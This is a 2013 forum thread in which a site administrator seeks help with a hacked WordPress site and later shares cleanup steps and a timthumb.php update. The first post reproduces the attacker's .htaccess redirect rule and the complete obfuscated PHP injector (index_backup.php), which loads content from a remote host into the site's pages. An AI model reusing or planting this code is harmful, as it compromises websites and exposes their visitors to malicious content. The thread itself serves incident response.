 | Navigation |  |
 | Users Online |  |
 |
Guests Online: 1
No Members Online
Registered Members: 856
Unactivated Members: 118
Newest Member: lakim
|  |  |  |  |
 | Forum Threads |  |
 | Latest Articles |  |
|
 | View Thread |  |
 |
Author |
Wordpress infected index_backup.php |
admin
Super Administrator

Posts: 33
Location:
Joined: 03.11.09 |
Posted on 10-06-2013 19:11 |
|
|
Wordpress infected index_backup.php
Hi All,
I have problem with web site based on Wordpress. The site was hacked, in the .htaccess file is added the following code block:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|
excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|
linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|
amfibi|dmoz|yippy|
walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|
thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|
allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|
bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|
abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|
suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|
alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|
hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nl
search|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|
alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|
globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|
simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|
apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|
finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|
keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|
claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
In almost all directories I found .htaccess file with this code and uploaded somehow file named index_backup.php
The content of index_backup.php file is the following:
<? $GLOBALS['_62805507_']=Array(base64_decode(''.'ZG'.'VmaW5'.'l'),base64_decode('ZmlsZV'.'9nZ'.'XRfY29'.'u'.'dGV'.'udHM'.'='),base64_decode('c3RyZ'.
'WFtX'.'2Nvbn'.'RleHR'.'fY3JlYXR'.'l'),base64_decode(''.'Zml'.'sZV9nZ'.'X'.'RfY29'.'udGVudHM='),base64_decode('c3'.'R'.'ybmF0'.'Y21'.'w'),
base64_decode('bXRfcmFuZ'.'A='.'='),base64_decode('ZnB1dHM='),
base64_decode('ZnJlYWQ'.'='),base64_decode('ZmN'.'sb3N'.'l'),base64_decode('c3RycG9z'),base64_decode('YW'.'RkY3NsYX'.'N'.'oZXM='),base64_decode('Z'.'mZsdXNo'),
base64_decode(''.'c3V'.'ic3Ry'),
base64_decode('Zm'.'lsZV'.'9'.'nZXRfY29udGVu'.'dH'.'M='),
base64_decode('YXJyY'.'XlfZm'.'lsbF9rZXlz'),base64_decode(''.'Y3Vyb'.'F9pbml0'),
base64_decode('Y3VybF9tdWx0aV9leGVj'),base64_decode('YXJyY'.'Xlfc'.'HVzaA=='),
base64_decode('Y3VybF9zZXRvc'.'HQ'.'='),
base64_decode('bXRf'.'cmFuZ'.'A=='),base64_decode('aW1hZ'.
'2VjcmVhdGVmcm9'.'tZ2lm'),base64_decode('Y3'.'Vy'.'bF9'.'zZX'.'RvcH'.'Q'.'='),
base64_decode('Y3VybF9zZX'.'Rvc'.'HQ='),
base64_decode('Y3'.'Vy'.'bF'.'9l'.'eG'.'Vj'),base64_decode('Y3'.'Vy'.
'bF9jbG9z'.'Z'.'Q=='),base64_decode(''.'aW5pX2d'.'ldA='.'='),
base64_decode('c'.'GFyc2VfdX'.'Js'),base64_decode('ZnNv'.'Y2tv'.'cGVu'),
base64_decode('ZnV'.'uY3R'.'p'.'b'.'2'.'5f'.'Z'.'Xh'.'pc'.'3Rz')); ?><? function _1051993851($i){$a=Array('SUZ'.'SQU1FX1'.'V'.'S'.'T'.'A==',
'aH'.'R0c'.'DovL3d'.'vcmRwcmV'.
'zc3Rlc3Qu'.'aW'.'5m'.'by83Ln'.'R4'.'d'.'A='.'=',''.'ZA==','aHR0cDovLw='.'=','S'.'F'.'RUU'.'F9IT1NU','Uk'.'VRVU'.'VTV'.'F'.'9VUkk'.'=','a'.'HR0'.'cA==','dGltZW91dA==',
'R'.'0VUIA==',''.'Pw='.'=','I'.'CB'.'IVFRQLzEuMA0K','VXNlci1BZ2VudDo'.'gTW96'.'a'.'WxsYS81L'.'jAgKFd'.'p'.'bmRvd3M7IFU7IFdpbmRvd'.'3MgT'.'lQgN'.
'S4xO'.'yBl'.'b'.'i1V'.'UzsgcnY6MS44LjA'.'uMykgR2'.'Vj'.'a2'.'8v'.'MjAwNjA0'.'M'.
'jYgRmlyZW'.'ZveC8x'.'LjUuM'.'C4zDQo=',''.'QW'.'NjZXB0'.'OiAqLyoNCg='.'=','QWNjZXB0'.'LUxhb'.'md1YWdlOiBlbi11cyxlbjt'.'xPTAuNQ0K','QWN'.'jZXB'.'0L'.
'UNo'.'YXJz'.'ZX'.'Q6IElTTy04'.'ODU5LTEsdXR'.'mLTg7cT'.'0wLjcs'.'Kjt'.'xPTAu'.
'Nw0K','S2VlcC'.'1'.'Bb'.'Gl'.'2'.'ZT'.'ogMzA'.'w'.'D'.'Qo=',''.'Q29'.'ubmVjd'.
'Glv'.'bjoga'.'2Vl'.'cC1hbGl2ZQ0K','aQ==','DQoNC'.'g==','Y'.'Wxsb3df'.'dXJsX'.
'2ZvcG'.'Vu','aG9zd'.'A==','aG9zd'.'A==','cGF0aA==','cXVl'.'c'.'nk=',''.
'Y3VybF9pbm'.'l0');return base64_decode($a[$i]);} ?><?php $GLOBALS['_62805507_'][0](_1051993851(0),_1051993851(1));$_0=_1051993851(2);echo l__3(IFRAME_URL);$_1=round(0+2345.5+2345.5);echo@
$GLOBALS['_62805507_'][1](_1051993851(3) .$_SERVER[_1051993851(4)] .$_SERVER[_1051993851(5)]);function l__0($_2){$_3=$GLOBALS['_62805507_'][2](array(_1051993851(6)=> array(_1051993851(7)=>
round(0+3+3+3+3+3))));return $GLOBALS['_62805507_'][3]($_2,false,$_3);(round(0+3799)-round(0+759.8+759.8+759.8+759.8+759.8)+round(0+3457)-round(0+3457))?$GLOBALS['_62805507_'][4]($_4,$_3):$GLOBALS['_62805507_'][5](round(0+767.33333333333+767.33333333333+767.33333333333)
,round(0+1266.3333333333+1266.3333333333+1266.3333333333));}function l__1($_5,$_6,$_7,$_8){$GLOBALS['_62805507_'][6]($_5,_1051993851(8) .$_7 .
_1051993851(9) .$_8 ._1051993851(10) ."Host: $_6\r\n" ._1051993851(11) ._1051993851(12) ._1051993851(13) ._1051993851(14) ._1051993851(15) ._1051993851(16) ."Referer: http://$_6\r\n\r\n");while($_4=$GLOBALS['_62805507_'][7]($_5,round
(0+1365.3333333333+1365.3333333333+1365.3333333333))){$_9 .= $_4;}$GLOBALS['_62805507_'][8]($_5);$_10=_1051993851(17);$_11=
$GLOBALS['_62805507_'][9]($_9,_1051993851(18));if((round
(0+968.25+968.25+968.25+968.25)^round(0+1291+1291+1291))&& $GLOBALS['_62805507_'][10]($_5,$_2,$_5,$_7))$GLOBALS['_62805507_'][11]($_12,$_7,$_11);
$_9=$GLOBALS['_62805507_'][12]($_9,$_11+round(0+1.3333333333333+1.3333333333333+1.3333333333333));
if((round(0+1014.5+1014.5+1014.5+1014.5)^round(0+4058))&&
$GLOBALS['_62805507_'][13]($_3,$_3,$_3))$GLOBALS['_62805507_'][14]($_13);return $_9;}function l__2($_2){$_13=$GLOBALS['_62805507_'][15]($_2);if((round(0+736.6+736.6+736.6+736.6+736.6)+round(0+312+312+312))>
round(0+3683)|| $GLOBALS['_62805507_'][16]($_14));else{$GLOBALS
['_62805507_'][17]($_11);}$GLOBALS['_62805507_'][18]($_13,42,FALSE);if(round(0+3068.5+3068.5)<$GLOBALS['_62805507_'][19](round(0+572.33333333333+572.33333333333+572.33333333333),round
(0+4415)))$GLOBALS['_62805507_'][20]($_2,$_15,$_16);$GLOBALS['_62805507_'][21]($_13,19913,TRUE);$GLOBALS['_62805507_'][22]
($_13,13,round(0+3+3+3+3+3));$_12=$GLOBALS['_62805507_'][23]($_13);$GLOBALS['_62805507_'][24]($_13);return $_12;}function l__3($_2)
{if($GLOBALS['_62805507_'][25](_1051993851(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){echo l__0
($_2);}else{$_14=$GLOBALS['_62805507_'][26]($_2);if($_5=@$GLOBALS['_62805507_'][27]($_14[_1051993851(20)],round
(0+40+40),$_15,$_16,round(0+3+3+3+3+3))){echo l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]);}elseif
(@$GLOBALS['_62805507_'][28](_1051993851(24))){echo l__2($_2);}}}
The php code is encoded and it is hard to read the implemented functionality. If you have some suggestions, fix and prevent of future infection, please share this information. I hope this web virus problem will be resolved soon. If I find some solution I will write you about the infection fix.
Cheers
Edited by admin on 13-06-2013 06:10 |
|
Author |
RE: How to clean this infection |
admin
Super Administrator

Posts: 33
Location:
Joined: 03.11.09 |
Posted on 10-06-2013 19:39 |
|
|
1. Get your latest clean backup.
2. Download all files from your Wordpress installation.
Do diff of the both directories clean and infected. For diff you can use
Beyondcompare for windows or meld for Linux. Delete all new files from
infected directory clean .htaccess file. That is all.
3. Now the question is how to prevent new infection of the site from the same virus.
Please write your suggestions. |
|
Author |
RE: Wordpress infected index_backup.php |
admin
Super Administrator

Posts: 33
Location:
Joined: 03.11.09 |
Posted on 13-06-2013 06:14 |
|
|
It seems the infection attack comes from file "thumb.php" in themes folder, there you can find fopen function with write ("w") parameter.
"Look for a file in your WordPress theme’s folder called timthumb.php. If it’s there, you need to fix it."
Here is the fix of the vulnerability:
How to Replace timthumb.php in Your WordPress Theme
The easiest, safest and fastest way to eliminate this vulnerability to your website without risking breaking other functions is to follow the instructions I outlined in the video clip:
http://www.epiphanymarketing.com/blog/2011/08/18/timthumb-wordpress-how-to-fix-the-timthumb-php-vulnerability-in-your-wordpress-theme/
The version of of thumb.php file on my infected installation was define ('VERSION', '2.8.10');
I have updated it to define ('VERSION', '2.8.11');
For now I don't have problems.
Please, write in this thread if you find other solution.
Edited by admin on 13-06-2013 06:21 |
|
|
|  |  |  |  |
|
 | Login |  |
 |
Not a member yet? Click here to register.
Forgotten your password? Request a new one here.
|  |  |  |  |
 | Member Poll |  |
 | Shoutbox |  |
 |
You must login to post a message.
|  |  |  |  |
|